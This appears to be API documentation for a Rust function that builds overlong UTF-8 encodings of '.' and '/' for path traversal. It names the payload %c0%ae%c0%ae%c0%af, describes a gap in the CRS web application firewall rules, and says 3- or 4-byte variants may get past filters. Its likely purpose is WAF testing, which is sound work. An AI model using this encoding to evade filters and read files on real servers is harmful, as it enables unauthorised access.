pub fn overlong_utf8_path(path: &str, width: u8) -> StringExpand description
Overlong UTF-8 encoding of . and / for path traversal.
CRS GitHub issue #4189 (opened 2025-07, still open) — CRS does
not alert on %c0%ae%c0%ae%c0%af (../ in 2-byte overlong UTF-8).
Servers that strictly decode UTF-8 reject these as malformed; older
JVMs, some C libs (CVE-2017-9805 Struts2), and a non-trivial set
of internal services accept them. WAF gap + permissive backend =
path traversal that the WAF doesn’t see.
width selects the overlong representation: 2 (default), 3, or 4
bytes. Each level is independently checked by some decoders, so a
3-byte overlong may pass where a 2-byte one is filtered.